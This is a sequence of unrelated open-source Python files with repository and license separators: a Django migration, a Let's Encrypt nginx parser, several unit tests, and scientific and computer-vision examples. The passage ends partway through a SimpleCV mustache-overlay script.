"""Fake packager for offline mode"""
import platform
import gettext
_ = lambda m: gettext.dgettext(message=m, domain='ovirt-engine-setup')
from otopi import constants as otopicons
from otopi import packager
from otopi import util
from otopi import plugin
from ovirt_engine_setup import constants as osetupcons
@util.export
class Plugin(plugin.PluginBase, packager.PackagerBase):
"""Offline packager."""
def install(self, packages, ignoreErrors=False):
pass
def update(self, packages, ignoreErrors=False):
pass
def queryPackages(self, patterns=None):
if patterns == ['vdsm']:
return [
{
'operation': 'installed',
'display_name': 'vdsm',
'name': 'vdsm',
'version': '999.9.9',
'release': '1',
'epoch': '0',
'arch': 'noarch',
},
]
else:
return []
def __init__(self, context):
super(Plugin, self).__init__(context=context)
self._distribution = platform.linux_distribution(
full_distribution_name=0
)[0]
@plugin.event(
stage=plugin.Stages.STAGE_INIT,
after=(
otopicons.Stages.PACKAGERS_DETECTION,
),
)
def _init(self):
if self.environment.setdefault(
osetupcons.CoreEnv.OFFLINE_PACKAGER,
(
self.environment[osetupcons.CoreEnv.DEVELOPER_MODE] or
self._distribution not in ('redhat', 'fedora', 'centos')
),
):
self.logger.debug('Registering offline packager')
self.context.registerPackager(packager=self)
# vim: expandtab tabstop=4 shiftwidth=4
| gpl-3.0 |
mattvonrocketstein/smash | smashlib/ipy3x/nbconvert/filters/datatypefilter.py | 1 | 1220 | """Filter used to select the first preferred output format available.
The filter contained in the file allows the converter templates to select
the output format that is most valuable to the active export format. The
value of the different formats is set via
NbConvertBase.display_data_priority
"""
#-----------------------------------------------------------------------------
# Copyright (c) 2013, the IPython Development Team.
#
# Distributed under the terms of the Modified BSD License.
#
# The full license is in the file COPYING.txt, distributed with this software.
#-----------------------------------------------------------------------------
#-----------------------------------------------------------------------------
# Classes and functions
#-----------------------------------------------------------------------------
from ..utils.base import NbConvertBase
__all__ = ['DataTypeFilter']
class DataTypeFilter(NbConvertBase):
""" Returns the preferred display format """
def __call__(self, output):
""" Return the first available format in the priority """
for fmt in self.display_data_priority:
if fmt in output:
return [fmt]
return []
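# For example, if display_data_priority were ['text/html', 'text/plain']
# (illustrative values), an output mapping containing both keys would be
# filtered down to ['text/html'].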
| mit |
sbidoul/buildbot | master/buildbot/test/unit/test_worker_manager.py | 10 | 4219 | # This file is part of Buildbot. Buildbot is free software: you can
# redistribute it and/or modify it under the terms of the GNU General Public
# License as published by the Free Software Foundation, version 2.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, write to the Free Software Foundation, Inc., 51
# Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Copyright Buildbot Team Members
from __future__ import absolute_import
from __future__ import print_function
import mock
from twisted.internet import defer
from twisted.trial import unittest
from zope.interface import implementer
from buildbot import interfaces
from buildbot.process import botmaster
from buildbot.test.fake import fakemaster
from buildbot.util import service
from buildbot.worker import manager as workermanager
@implementer(interfaces.IWorker)
class FakeWorker(service.BuildbotService):
reconfig_count = 0
def __init__(self, workername):
service.BuildbotService.__init__(self, name=workername)
def reconfigService(self):
self.reconfig_count += 1
self.configured = True
return defer.succeed(None)
class FakeWorker2(FakeWorker):
pass
class TestWorkerManager(unittest.TestCase):
def setUp(self):
self.master = fakemaster.make_master(testcase=self,
wantMq=True, wantData=True)
self.workers = workermanager.WorkerManager(self.master)
self.workers.setServiceParent(self.master)
# workers expect a botmaster as well as a manager.
self.master.botmaster.disownServiceParent()
self.botmaster = botmaster.BotMaster()
self.master.botmaster = self.botmaster
self.master.botmaster.setServiceParent(self.master)
self.new_config = mock.Mock()
self.workers.startService()
def tearDown(self):
return self.workers.stopService()
@defer.inlineCallbacks
def test_reconfigServiceWorkers_add_remove(self):
worker = FakeWorker('worker1')
self.new_config.workers = [worker]
yield self.workers.reconfigServiceWithBuildbotConfig(self.new_config)
self.assertIdentical(worker.parent, self.workers)
self.assertEqual(self.workers.workers, {'worker1': worker})
self.new_config.workers = []
self.assertEqual(worker.running, True)
yield self.workers.reconfigServiceWithBuildbotConfig(self.new_config)
self.assertEqual(worker.running, False)
@defer.inlineCallbacks
def test_reconfigServiceWorkers_reconfig(self):
worker = FakeWorker('worker1')
worker.setServiceParent(self.workers)
worker.parent = self.master
worker.manager = self.workers
worker.botmaster = self.master.botmaster
worker_new = FakeWorker('worker1')
self.new_config.workers = [worker_new]
yield self.workers.reconfigServiceWithBuildbotConfig(self.new_config)
# worker was not replaced..
self.assertIdentical(self.workers.workers['worker1'], worker)
@defer.inlineCallbacks
def test_reconfigServiceWorkers_class_changes(self):
worker = FakeWorker('worker1')
worker.setServiceParent(self.workers)
worker_new = FakeWorker2('worker1')
self.new_config.workers = [worker_new]
yield self.workers.reconfigServiceWithBuildbotConfig(self.new_config)
# worker *was* replaced (different class)
self.assertIdentical(self.workers.workers['worker1'], worker_new)
@defer.inlineCallbacks
def test_newConnection_remoteGetWorkerInfo_failure(self):
class Error(RuntimeError):
pass
conn = mock.Mock()
conn.remoteGetWorkerInfo = mock.Mock(
return_value=defer.fail(Error()))
yield self.assertFailure(
self.workers.newConnection(conn, "worker"), Error)
| gpl-2.0 |
blaze33/django | django/views/decorators/vary.py | 329 | 1197 | from functools import wraps
from django.utils.cache import patch_vary_headers
from django.utils.decorators import available_attrs
def vary_on_headers(*headers):
"""
A view decorator that adds the specified headers to the Vary header of the
response. Usage:
@vary_on_headers('Cookie', 'Accept-language')
def index(request):
...
Note that the header names are not case-sensitive.
"""
def decorator(func):
@wraps(func, assigned=available_attrs(func))
def inner_func(*args, **kwargs):
response = func(*args, **kwargs)
patch_vary_headers(response, headers)
return response
return inner_func
return decorator
def vary_on_cookie(func):
"""
A view decorator that adds "Cookie" to the Vary header of a response. This
    indicates that a page's contents depend on cookies. Usage:
@vary_on_cookie
def index(request):
...
"""
@wraps(func, assigned=available_attrs(func))
def inner_func(*args, **kwargs):
response = func(*args, **kwargs)
patch_vary_headers(response, ('Cookie',))
return response
return inner_func
| bsd-3-clause |
catapult-project/catapult | systrace/profile_chrome/chrome_startup_tracing_agent_unittest.py | 6 | 1066 | # Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
from profile_chrome import chrome_startup_tracing_agent
from systrace import decorators
from systrace.tracing_agents import agents_unittest
class ChromeAgentTest(agents_unittest.BaseAgentTest):
# TODO(washingtonp): This test seems to fail on the version of Android
# currently on the Trybot servers (KTU84P), although it works on Android M.
# Either upgrade the version of Android on the Trybot servers or determine
# if there is a way to run this agent on Android KTU84P.
@decorators.Disabled
def testTracing(self):
agent = chrome_startup_tracing_agent.ChromeStartupTracingAgent(
self.device, self.package_info,
'', # webapk_package
False, # cold
'https://www.google.com' # url
)
try:
agent.StartAgentTracing(None)
finally:
agent.StopAgentTracing()
result = agent.GetResults()
json.loads(result.raw_data)
| bsd-3-clause |
sapics/letsencrypt | letsencrypt-nginx/letsencrypt_nginx/parser.py | 26 | 16596 | """NginxParser is a member object of the NginxConfigurator class."""
import glob
import logging
import os
import pyparsing
import re
from letsencrypt import errors
from letsencrypt_nginx import obj
from letsencrypt_nginx import nginxparser
logger = logging.getLogger(__name__)
class NginxParser(object):
"""Class handles the fine details of parsing the Nginx Configuration.
    :ivar str root: Normalized absolute path to the server root
directory. Without trailing slash.
:ivar dict parsed: Mapping of file paths to parsed trees
"""
def __init__(self, root, ssl_options):
self.parsed = {}
self.root = os.path.abspath(root)
self.loc = self._set_locations(ssl_options)
# Parse nginx.conf and included files.
# TODO: Check sites-available/ as well. For now, the configurator does
# not enable sites from there.
self.load()
def load(self):
"""Loads Nginx files into a parsed tree.
"""
self.parsed = {}
self._parse_recursively(self.loc["root"])
def _parse_recursively(self, filepath):
"""Parses nginx config files recursively by looking at 'include'
directives inside 'http' and 'server' blocks. Note that this only
reads Nginx files that potentially declare a virtual host.
:param str filepath: The path to the files to parse, as a glob
"""
filepath = self.abs_path(filepath)
trees = self._parse_files(filepath)
for tree in trees:
for entry in tree:
if _is_include_directive(entry):
# Parse the top-level included file
self._parse_recursively(entry[1])
elif entry[0] == ['http'] or entry[0] == ['server']:
# Look for includes in the top-level 'http'/'server' context
for subentry in entry[1]:
if _is_include_directive(subentry):
self._parse_recursively(subentry[1])
elif entry[0] == ['http'] and subentry[0] == ['server']:
# Look for includes in a 'server' context within
# an 'http' context
for server_entry in subentry[1]:
if _is_include_directive(server_entry):
self._parse_recursively(server_entry[1])
def abs_path(self, path):
"""Converts a relative path to an absolute path relative to the root.
Does nothing for paths that are already absolute.
:param str path: The path
:returns: The absolute path
:rtype: str
"""
if not os.path.isabs(path):
return os.path.join(self.root, path)
else:
return path
def get_vhosts(self):
# pylint: disable=cell-var-from-loop
"""Gets list of all 'virtual hosts' found in Nginx configuration.
Technically this is a misnomer because Nginx does not have virtual
hosts, it has 'server blocks'.
:returns: List of :class:`~letsencrypt_nginx.obj.VirtualHost`
objects found in configuration
:rtype: list
"""
enabled = True # We only look at enabled vhosts for now
vhosts = []
servers = {}
for filename in self.parsed:
tree = self.parsed[filename]
servers[filename] = []
srv = servers[filename] # workaround undefined loop var in lambdas
# Find all the server blocks
_do_for_subarray(tree, lambda x: x[0] == ['server'],
lambda x: srv.append(x[1]))
# Find 'include' statements in server blocks and append their trees
for i, server in enumerate(servers[filename]):
new_server = self._get_included_directives(server)
servers[filename][i] = new_server
for filename in servers:
for server in servers[filename]:
# Parse the server block into a VirtualHost object
parsed_server = _parse_server(server)
vhost = obj.VirtualHost(filename,
parsed_server['addrs'],
parsed_server['ssl'],
enabled,
parsed_server['names'],
server)
vhosts.append(vhost)
return vhosts
def _get_included_directives(self, block):
"""Returns array with the "include" directives expanded out by
concatenating the contents of the included file to the block.
:param list block:
:rtype: list
"""
result = list(block) # Copy the list to keep self.parsed idempotent
for directive in block:
if _is_include_directive(directive):
included_files = glob.glob(
self.abs_path(directive[1]))
for incl in included_files:
try:
result.extend(self.parsed[incl])
except KeyError:
pass
return result
def _parse_files(self, filepath, override=False):
"""Parse files from a glob
:param str filepath: Nginx config file path
:param bool override: Whether to parse a file that has been parsed
:returns: list of parsed tree structures
:rtype: list
"""
files = glob.glob(filepath)
trees = []
for item in files:
if item in self.parsed and not override:
continue
try:
with open(item) as _file:
parsed = nginxparser.load(_file)
self.parsed[item] = parsed
trees.append(parsed)
except IOError:
logger.warn("Could not open file: %s", item)
except pyparsing.ParseException:
logger.debug("Could not parse file: %s", item)
return trees
def _set_locations(self, ssl_options):
"""Set default location for directives.
Locations are given as file_paths
.. todo:: Make sure that files are included
"""
root = self._find_config_root()
default = root
nginx_temp = os.path.join(self.root, "nginx_ports.conf")
if os.path.isfile(nginx_temp):
listen = nginx_temp
name = nginx_temp
else:
listen = default
name = default
return {"root": root, "default": default, "listen": listen,
"name": name, "ssl_options": ssl_options}
def _find_config_root(self):
"""Find the Nginx Configuration Root file."""
location = ['nginx.conf']
for name in location:
if os.path.isfile(os.path.join(self.root, name)):
return os.path.join(self.root, name)
raise errors.NoInstallationError(
"Could not find configuration root")
def filedump(self, ext='tmp'):
"""Dumps parsed configurations into files.
:param str ext: The file extension to use for the dumped files. If
empty, this overrides the existing conf files.
"""
for filename in self.parsed:
tree = self.parsed[filename]
if ext:
filename = filename + os.path.extsep + ext
try:
with open(filename, 'w') as _file:
nginxparser.dump(tree, _file)
except IOError:
logger.error("Could not open file for writing: %s", filename)
def _has_server_names(self, entry, names):
"""Checks if a server block has the given set of server_names. This
is the primary way of identifying server blocks in the configurator.
Returns false if 'entry' doesn't look like a server block at all.
        .. todo:: Doesn't match server blocks whose server_name directives are
split across multiple conf files.
:param list entry: The block to search
:param set names: The names to match
:rtype: bool
"""
if len(names) == 0:
# Nothing to identify blocks with
return False
if not isinstance(entry, list):
# Can't be a server block
return False
new_entry = self._get_included_directives(entry)
server_names = set()
for item in new_entry:
if not isinstance(item, list):
# Can't be a server block
return False
if item[0] == 'server_name':
server_names.update(_get_servernames(item[1]))
return server_names == names
def add_server_directives(self, filename, names, directives,
replace=False):
"""Add or replace directives in the first server block with names.
        .. note:: If replace is True, this raises a misconfiguration error
if the directive does not already exist.
        .. todo:: Doesn't match server blocks whose server_name directives are
split across multiple conf files.
:param str filename: The absolute filename of the config file
:param set names: The server_name to match
:param list directives: The directives to add
:param bool replace: Whether to only replace existing directives
"""
_do_for_subarray(self.parsed[filename],
lambda x: self._has_server_names(x, names),
lambda x: _add_directives(x, directives, replace))
def add_http_directives(self, filename, directives):
"""Adds directives to the first encountered HTTP block in filename.
:param str filename: The absolute filename of the config file
:param list directives: The directives to add
"""
_do_for_subarray(self.parsed[filename],
lambda x: x[0] == ['http'],
lambda x: _add_directives(x[1], [directives], False))
def get_all_certs_keys(self):
"""Gets all certs and keys in the nginx config.
:returns: list of tuples with form [(cert, key, path)]
cert - str path to certificate file
key - str path to associated key file
path - File path to configuration file.
:rtype: set
"""
c_k = set()
vhosts = self.get_vhosts()
for vhost in vhosts:
tup = [None, None, vhost.filep]
if vhost.ssl:
for directive in vhost.raw:
if directive[0] == 'ssl_certificate':
tup[0] = directive[1]
elif directive[0] == 'ssl_certificate_key':
tup[1] = directive[1]
if tup[0] is not None and tup[1] is not None:
c_k.add(tuple(tup))
return c_k
def _do_for_subarray(entry, condition, func):
"""Executes a function for a subarray of a nested array if it matches
the given condition.
:param list entry: The list to iterate over
:param function condition: Returns true iff func should be executed on item
:param function func: The function to call for each matching item
"""
if isinstance(entry, list):
if condition(entry):
func(entry)
else:
for item in entry:
_do_for_subarray(item, condition, func)
def get_best_match(target_name, names):
"""Finds the best match for target_name out of names using the Nginx
name-matching rules (exact > longest wildcard starting with * >
longest wildcard ending with * > regex).
:param str target_name: The name to match
:param set names: The candidate server names
:returns: Tuple of (type of match, the name that matched)
:rtype: tuple
"""
exact = []
wildcard_start = []
wildcard_end = []
regex = []
for name in names:
if _exact_match(target_name, name):
exact.append(name)
elif _wildcard_match(target_name, name, True):
wildcard_start.append(name)
elif _wildcard_match(target_name, name, False):
wildcard_end.append(name)
elif _regex_match(target_name, name):
regex.append(name)
if len(exact) > 0:
# There can be more than one exact match; e.g. eff.org, .eff.org
match = min(exact, key=len)
return ('exact', match)
if len(wildcard_start) > 0:
# Return the longest wildcard
match = max(wildcard_start, key=len)
return ('wildcard_start', match)
if len(wildcard_end) > 0:
# Return the longest wildcard
match = max(wildcard_end, key=len)
return ('wildcard_end', match)
if len(regex) > 0:
# Just return the first one for now
match = regex[0]
return ('regex', match)
return (None, None)
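# For example, get_best_match('www.eff.org', {'eff.org', '*.eff.org'}) should
# return ('wildcard_start', '*.eff.org') under the precedence rules above.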
def _exact_match(target_name, name):
return target_name == name or '.' + target_name == name
def _wildcard_match(target_name, name, start):
# Degenerate case
if name == '*':
return True
parts = target_name.split('.')
match_parts = name.split('.')
# If the domain ends in a wildcard, do the match procedure in reverse
if not start:
parts.reverse()
match_parts.reverse()
# The first part must be a wildcard or blank, e.g. '.eff.org'
first = match_parts.pop(0)
if first != '*' and first != '':
return False
target_name = '.'.join(parts)
name = '.'.join(match_parts)
# Ex: www.eff.org matches *.eff.org, eff.org does not match *.eff.org
return target_name.endswith('.' + name)
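# e.g. _wildcard_match('www.eff.org', '*.eff.org', True) is True, while the
# bare domain 'eff.org' does not match '*.eff.org'.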
def _regex_match(target_name, name):
# Must start with a tilde
if len(name) < 2 or name[0] != '~':
return False
# After tilde is a perl-compatible regex
try:
regex = re.compile(name[1:])
if re.match(regex, target_name):
return True
else:
return False
except re.error:
# perl-compatible regexes are sometimes not recognized by python
return False
def _is_include_directive(entry):
"""Checks if an nginx parsed entry is an 'include' directive.
:param list entry: the parsed entry
:returns: Whether it's an 'include' directive
:rtype: bool
"""
return (isinstance(entry, list) and
entry[0] == 'include' and len(entry) == 2 and
isinstance(entry[1], str))
def _get_servernames(names):
"""Turns a server_name string into a list of server names
:param str names: server names
:rtype: list
"""
whitespace_re = re.compile(r'\s+')
names = re.sub(whitespace_re, ' ', names)
return names.split(' ')
def _parse_server(server):
"""Parses a list of server directives.
:param list server: list of directives in a server block
:rtype: dict
"""
parsed_server = {}
parsed_server['addrs'] = set()
parsed_server['ssl'] = False
parsed_server['names'] = set()
for directive in server:
if directive[0] == 'listen':
addr = obj.Addr.fromstring(directive[1])
parsed_server['addrs'].add(addr)
if not parsed_server['ssl'] and addr.ssl:
parsed_server['ssl'] = True
elif directive[0] == 'server_name':
parsed_server['names'].update(
_get_servernames(directive[1]))
return parsed_server
def _add_directives(block, directives, replace=False):
"""Adds or replaces directives in a block. If the directive doesn't exist in
the entry already, raises a misconfiguration error.
    .. todo:: Find directives that are in included files.
:param list block: The block to replace in
:param list directives: The new directives.
"""
if replace:
for directive in directives:
changed = False
if len(directive) == 0:
continue
for index, line in enumerate(block):
if len(line) > 0 and line[0] == directive[0]:
block[index] = directive
changed = True
if not changed:
raise errors.MisconfigurationError(
'LetsEncrypt expected directive for %s in the Nginx '
'config but did not find it.' % directive[0])
else:
block.extend(directives)
| apache-2.0 |
geometalab/osmaxx-frontend | osmaxx/excerptexport/migrations/0033_add_countries_as_public_excerpts_20160518_1401.py | 2 | 2038 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-05-18 12:01
from __future__ import unicode_literals
import os
from django.db import migrations
def get_polyfile_name_to_file_mapping():
from osmaxx.excerptexport._settings import POLYFILE_LOCATION
from osmaxx.utils.polyfile_helpers import _is_polyfile
filenames = os.listdir(POLYFILE_LOCATION)
return {
_extract_country_name_from_polyfile_name(filename): filename
for filename in filenames if _is_polyfile(filename)
}
def _extract_country_name_from_polyfile_name(filename):
from osmaxx.utils.polyfile_helpers import POLYFILE_FILENAME_EXTENSION
name, _ = filename.split(POLYFILE_FILENAME_EXTENSION)
return name
def import_countries(apps, schema_editor): # noqa
from osmaxx.utils.polyfile_helpers import polyfile_to_geos_geometry
Excerpt = apps.get_model("excerptexport", "Excerpt") # noqa
ExtractionOrder = apps.get_model("excerptexport", "ExtractionOrder") # noqa
for name, polyfile_path in get_polyfile_name_to_file_mapping().items():
geometry = polyfile_to_geos_geometry(polyfile_path)
excerpt = Excerpt.objects.create(
is_public=True,
name=name,
bounding_geometry=geometry,
excerpt_type='country',
)
for extraction_order in ExtractionOrder.objects.filter(excerpt__name=name):
extraction_order.excerpt = excerpt
extraction_order.save()
def remove_countries(apps, schema_editor): # noqa
Excerpt = apps.get_model("excerptexport", "Excerpt") # noqa
ExtractionOrder = apps.get_model("excerptexport", "ExtractionOrder") # noqa
existing_extraction_orders = ExtractionOrder.objects.all()
Excerpt.objects.exclude(extraction_orders__in=existing_extraction_orders).delete()
class Migration(migrations.Migration):
dependencies = [
('excerptexport', '0032_allow_user_None'),
]
operations = [
migrations.RunPython(import_countries, remove_countries),
]
| mit |
meithan/tictactoe | SwarmTrainer.py | 1 | 5058 | # Trains a neural network to play tic-tac-toe using Particle
# Swarm Optimization
import random
import numpy as np
from NeuralNetwork import NeuralNetwork
from NNPlayer import NNPlayer
from trials import evaluate_player
# ==================================
# PSO global constants
xi = 0.72984
c1 = 2.05
c2 = 2.05
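# These are Clerc & Kennedy's constriction-PSO coefficients: with
# phi = c1 + c2 = 4.1, xi = 2 / abs(2 - phi - sqrt(phi**2 - 4*phi))
# evaluates to roughly 0.72984, the constant used above.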
# The particles, yo
# Note that fitness calculation has been outsourced to the trainer class
# so that it can be computed in parallel
class Particle:
def __init__(self, pos=None, vel=None):
if pos is None:
self.pos = None
else:
self.pos = np.copy(pos)
if vel is None:
self.vel = None
else:
self.vel = np.copy(vel)
self.fitness = None
self.neighbors = None
self.best_pos = None
self.best_fit = None
# Update the particle velocity
# Assumes fitness of all particles has been computed
def update_vel(self):
# Obtain best pos of neighbors
best_npos = None
best_nfit = None
for neigh in self.neighbors:
if best_npos is None or neigh.fitness > best_nfit:
best_nfit = neigh.fitness
best_npos = neigh.pos
# The update
e1 = np.random.random(self.vel.shape)
e2 = np.random.random(self.vel.shape)
self.vel = \
xi * ( \
self.vel \
+ c1 * e1 * (self.best_pos - self.pos) \
+ c2 * e2 * (best_npos - self.pos) \
)
# Moves the particle (only)
# Assumes velocity is updated
def move(self):
self.pos = self.pos + self.vel
# Updates the best position the particle has seen so far
# Assumes fitness for the current position has been calculated
def update_best_pos(self):
if self.best_pos is None or self.fitness > self.best_fit:
self.best_fit = self.fitness
self.best_pos = self.pos
# Receives a NNagent and uses the PSO algorithm to train it
class PSOTrainer:
# num_steps is the number of steps of the PSO
# num_parts is the number of particles to use
# num_neighs is the number of neighbors each particle has
# num_games is the number of games used to determine the win ratio
def __init__(self, num_steps=1000, num_parts=100, num_neighs=5, num_games=100000):
self.num_steps = num_steps
self.num_parts = num_parts
self.num_games = num_games
self.num_neighs = num_neighs
self.particles = []
# Evaluates the fitness of the particle
def eval_fitness(self, particle):
NN = NeuralNetwork(L=3, Ns=[9,9,9])
NN.load_serialized(particle.pos)
player = NNPlayer(NN=NN)
results = evaluate_player(player, self.num_games)
strength = results[0]
# Hack to prevent weight explosion
# if np.sum(np.abs(NN.weights[0])) > 1800 or np.sum(np.abs(NN.weights[1])) > 1800:
# strength = 0
return strength
# The actual training routine
def train(self):
# Create particles (with random NNs)
print("Creating particles ...")
for i in range(self.num_parts):
p = Particle()
NN = NeuralNetwork(L=3, Ns=[9,9,9])
NN.randomize()
p.pos = NN.serialize()
#p.vel = np.random.rand(len(p.pos))
p.vel = np.zeros(len(p.pos))
self.particles.append(p)
# Randomly set neighbors
print("Setting neighbors ...")
for i in range(self.num_parts):
particle = self.particles[i]
particle.neighbors = []
while len(particle.neighbors) < self.num_neighs:
neigh = random.choice(self.particles)
if neigh is not particle:
particle.neighbors.append(neigh)
# Evaluate initial fitness
print("Initializing ...")
fits = []
for i,particle in enumerate(self.particles):
particle.fitness = self.eval_fitness(particle)
particle.update_best_pos()
fits.append(particle.fitness)
print("Max fitness: %.5f" % max(fits))
print("Avg fitness: %.5f" % np.mean(fits))
print("Min fitness: %.5f" % min(fits))
print("Std fitness: %.5f" % np.std(fits))
# Main loop
print("\nTRAINING ...")
for step in range(1,self.num_steps+1):
print("\nStep %i" % step)
for i,particle in enumerate(self.particles):
particle.update_vel()
particle.move()
particle.fitness = self.eval_fitness(particle)
particle.update_best_pos()
        # one progress tick per particle evaluated
        print("=", end="", flush=True)
print()
best_part = None
best_fit = None
fits = []
for particle in self.particles:
fits.append(particle.fitness)
if best_fit is None or particle.fitness > best_fit:
best_fit = particle.fitness
best_part = particle
print("Max fitness: %.5f" % max(fits))
print("Avg fitness: %.5f" % np.mean(fits))
print("Min fitness: %.5f" % min(fits))
print("Std fitness: %.5f" % np.std(fits))
outfname = "swarm_%03i.nn" % step
NN = NeuralNetwork(L=3, Ns=[9,9,9])
NN.load_serialized(best_part.pos)
NN.save_to_file(outfname)
print("Saved best to %s" % outfname)
# ============================================
trainer = PSOTrainer(num_parts=50, num_games=1000)
trainer.train()
| gpl-3.0 |
akaariai/django | tests/model_options/test_default_related_name.py | 308 | 1645 | from django.test import TestCase
from .models.default_related_name import Author, Book, Editor
class DefaultRelatedNameTests(TestCase):
def setUp(self):
self.author = Author.objects.create(first_name="Dave", last_name="Loper")
self.editor = Editor.objects.create(name="Test Editions",
bestselling_author=self.author)
self.book = Book.objects.create(title="Test Book", editor=self.editor)
self.book.authors.add(self.author)
self.book.save()
def test_no_default_related_name(self):
try:
self.author.editor_set
except AttributeError:
self.fail("Author should have an editor_set relation.")
def test_default_related_name(self):
try:
self.author.books
except AttributeError:
self.fail("Author should have a books relation.")
def test_related_name_overrides_default_related_name(self):
try:
self.editor.edited_books
except AttributeError:
self.fail("Editor should have a edited_books relation.")
def test_inheritance(self):
try:
# Here model_options corresponds to the name of the application used
# in this test
self.book.model_options_bookstores
except AttributeError:
self.fail("Book should have a model_options_bookstores relation.")
def test_inheritance_with_overrided_default_related_name(self):
try:
self.book.editor_stores
except AttributeError:
self.fail("Book should have a editor_stores relation.")
| bsd-3-clause |
shedskin/shedskin | examples/adatron.py | 6 | 6315 | #!/usr/bin/env python
# Adatron SVM with a Gaussian (RBF) kernel
# placed in the public domain by Stavros Korokithakis
import sys
from math import exp
CYTOSOLIC = 0
EXTRACELLULAR = 1
NUCLEAR = 2
MITOCHONDRIAL = 3
BLIND = 4
D = 5.0
LENGTH = 50
PROTEINS = []
AMINOACIDS = "ACDEFGHIKLMNPQRSTVWY"
class Protein:
def __init__(self, name, mass, isoelectric_point, size, sequence, type):
self.name = name
self.mass = mass
self.isoelectric_point = isoelectric_point
self.size = size
self.sequence = sequence
self.type = type
self.extract_composition()
def extract_composition(self):
self.local_composition = dict(((x, 0.0) for x in AMINOACIDS))
for counter in range(LENGTH):
self.local_composition[self.sequence[counter]] += 1.0 / LENGTH
self.global_composition = dict(((x, 0.0) for x in AMINOACIDS))
for aminoacid in self.sequence:
self.global_composition[aminoacid] += 1.0 / len(self.sequence)
    def create_vector(self):
        vector = []
        for key, value in sorted(self.local_composition.items()):
            vector.append(value)
        for key in sorted(self.global_composition.keys()):
            vector.append(self.global_composition[key])
        return vector
def load_file(filename, type):
global PROTEINS
protfile = open(filename)
for line in protfile:
if line.startswith("name"):
continue
name, mass, isoelectric_point, size, sequence = line.strip().split("\t")
protein = Protein(name, mass, isoelectric_point, size, sequence, type)
PROTEINS.append(protein)
protfile.close()
def create_tables():
"""Create the feature and label tables."""
feature_table = []
label_table = []
for protein in PROTEINS:
feature_table.append(protein.create_vector())
for protein in PROTEINS:
if protein.type == BLIND:
continue
labels = [-1] * 4
# Invert the sign of the label our protein belongs to.
labels[protein.type] *= -1
label_table.append(labels)
return feature_table, label_table
def create_kernel_table(feature_table):
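    # Gram matrix of a Gaussian (RBF) kernel: K[i][j] = exp(-D * ||x_i - x_j||^2)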
kernel_table = []
for row in feature_table:
kernel_row = []
for candidate in feature_table:
difference = 0.0
for counter in range(len(row)):
difference += (row[counter] - candidate[counter]) ** 2
kernel_row.append(exp(-D*difference))
kernel_table.append(kernel_row)
return kernel_table
def train_adatron(kernel_table, label_table, h, c):
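    # Kernel-Adatron sketch: per class and sample, the margin gradient is
    # g = 1 - y * (prediction + bias); each alpha takes a step of size h and
    # is clipped into [0, c], and training stops once the largest per-class
    # alpha change falls below `tolerance`.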
tolerance = 0.5
alphas = [([0.0] * len(kernel_table)) for _ in range(len(label_table[0]))]
betas = [([0.0] * len(kernel_table)) for _ in range(len(label_table[0]))]
bias = [0.0] * len(label_table[0])
labelalphas = [0.0] * len(kernel_table)
max_differences = [(0.0, 0)] * len(label_table[0])
for iteration in range(10*len(kernel_table)):
print "Starting iteration %s..." % iteration
if iteration == 20: # XXX shedskin test
return alphas, bias
for klass in range(len(label_table[0])):
max_differences[klass] = (0.0, 0)
for elem in range(len(kernel_table)):
labelalphas[elem] = label_table[elem][klass] * alphas[klass][elem]
for col_counter in range(len(kernel_table)):
prediction = 0.0
for row_counter in range(len(kernel_table)):
prediction += kernel_table[col_counter][row_counter] * \
labelalphas[row_counter]
g = 1.0 - ((prediction + bias[klass]) * label_table[col_counter][klass])
betas[klass][col_counter] = min(max((alphas[klass][col_counter] + h * g), 0.0), c)
difference = abs(alphas[klass][col_counter] - betas[klass][col_counter])
if difference > max_differences[klass][0]:
max_differences[klass] = (difference, col_counter)
if all([max_difference[0] < tolerance for max_difference in max_differences]):
return alphas, bias
else:
alphas[klass][max_differences[klass][1]] = betas[klass][max_differences[klass][1]]
element_sum = 0.0
for element_counter in range(len(kernel_table)):
element_sum += label_table[element_counter][klass] * alphas[klass][element_counter] / 4
bias[klass] = bias[klass] + element_sum
def calculate_error(alphas, bias, kernel_table, label_table):
prediction = 0.0
predictions = [([0.0] * len(kernel_table)) for _ in range(len(label_table[0]))]
for klass in range(len(label_table[0])):
for col_counter in range(len(kernel_table)):
for row_counter in range(len(kernel_table)):
prediction += kernel_table[col_counter][row_counter] * \
label_table[row_counter][klass] * alphas[klass][row_counter]
predictions[klass][col_counter] = prediction + bias[klass]
for col_counter in range(len(kernel_table)):
current_predictions = []
error = 0
for row_counter in range(len(label_table[0])):
current_predictions.append(predictions[row_counter][col_counter])
predicted_class = current_predictions.index(max(current_predictions))
if label_table[col_counter][predicted_class] < 0:
error += 1
return 1.0 * error / len(kernel_table)
def main():
for filename, type in [("testdata/c.txt", CYTOSOLIC), ("testdata/e.txt", EXTRACELLULAR), ("testdata/n.txt", NUCLEAR), ("testdata/m.txt", MITOCHONDRIAL)]:#, ("b.txt", BLIND)]:
load_file(filename, type)
print "Creating feature tables..."
feature_table, label_table = create_tables()
#import pickle
#print "Loading kernel table..."
#kernel_file = file("kernel_table.txt")
#kernel_table = pickle.load(kernel_file)
#kernel_file.close()
print "Creating kernel table..."
kernel_table = create_kernel_table(feature_table)
print "Training SVM..."
alphas, bias = train_adatron(kernel_table, label_table, 1.0, 3.0)
print calculate_error(alphas, bias, kernel_table, label_table)
if __name__ == "__main__":
main()
| gpl-3.0 |
vdt/SimpleCV | SimpleCV/examples/manipulation/mustachinator.py | 13 | 1439 | #!/usr/bin/python
from operator import add
from SimpleCV import *
cam = Camera()
display = Display((800,600))
counter = 0
# load the cascades
face_cascade = HaarCascade("face")
nose_cascade = HaarCascade("nose")
stache = Image("stache.png", sample=True) # load the stache
mask = stache.createAlphaMask() # load the stache mask
count = 0
while display.isNotDone():
img = cam.getImage()
img = img.scale(.5) #use a smaller image
faces = img.findHaarFeatures(face_cascade) #find faces
if( faces is not None ): # if we have a face
faces = faces.sortArea() #get the biggest one
face = faces[-1]
myFace = face.crop() # get the face image
noses = myFace.findHaarFeatures(nose_cascade) #find the nose
if( noses is not None ):# if we have a nose
noses = noses.sortArea()
